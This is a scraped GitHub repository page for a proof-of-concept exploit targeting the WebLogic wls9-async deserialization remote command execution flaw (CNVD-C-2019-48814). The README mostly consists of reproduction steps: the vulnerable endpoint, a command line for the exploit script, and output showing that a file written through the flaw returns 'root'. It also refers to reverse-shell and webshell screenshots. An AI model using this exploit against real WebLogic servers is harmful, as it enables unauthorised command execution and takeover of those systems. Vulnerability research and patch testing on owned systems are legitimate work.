Skip to content

/CNVD-C-2019-48814 forked from jas502n/CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞
  1. Python 99.4%
  2. Shell 0.6%
Branch: master
Find File
Clone or download

Clone with HTTPS

Use Git or checkout with SVN using the web URL.

Open in Desktop Download ZIP

Launching GitHub Desktop...

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop...

If nothing happens, download GitHub Desktop and try again.

Launching Xcode...

If nothing happens, download Xcode and try again.

Launching Visual Studio...

If nothing happens, download the GitHub extension for Visual Studio and try again.

Pull request Compare This branch is 17 commits ahead, 2 commits behind jas502n:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
cve-2017-10271
CNVD-C-2019-48814.mp4
README.md
burpsuite.jpg
command.jpg
push.sh
python.jpg
reserve_shell.jpg
webshell.jpg

README.md

CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

漏洞复现:

http://10.10.20.166:7001/_async/AsyncResponseService

curl -i http://10.10.20.166:7001/_async/favicon.ico

CNVD-C-2019-48814 Video

CNVD-C-2019-48814

python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

Use RMI

CVE-2017-10271 No pactch

resever_shell

command see

webshell

You can’t perform that action at this time.